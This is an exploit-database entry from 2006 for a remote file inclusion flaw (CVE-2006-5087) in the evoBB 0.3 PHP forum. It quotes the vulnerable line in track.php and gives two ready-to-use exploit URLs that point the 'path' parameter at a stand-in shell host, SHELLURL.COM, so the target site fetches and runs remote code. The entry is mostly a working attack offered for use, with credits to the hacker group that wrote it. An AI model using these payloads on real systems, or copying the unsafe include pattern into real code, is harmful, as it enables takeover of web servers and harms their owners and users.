evoBB 0.3 - 'path' Remote File Inclusion

Author: SHiKaA
type: webapps
platform: php
port: 
date_added: 2006-09-24  
date_updated: 2016-09-12  
verified: 1  
codes: OSVDB-37964;CVE-2006-5087;OSVDB-37963  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comevoBBv0.3.zip  

raw file: 2431.txt  
#==============================================================================================
#evoBB <= v0.3 (path) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://www.4yougratis.it/script_php/forum/evoBBv0.3.htm
#
#Version : v0.3
#
#================================================================================================
#Bug in : track.php
#
#Vlu Code :
#--------------------------------
#
#        require_once($path.'connect.php');
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/track.php?path=http://SHELLURL.COM
#http://sitename.com/[Script Path]/connect.php?path=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Special Thx To : Str0ke & simoo & Timq & XoRoN & Saudi HAckerz
==================================================================================================

# milw0rm.com [2006-09-25]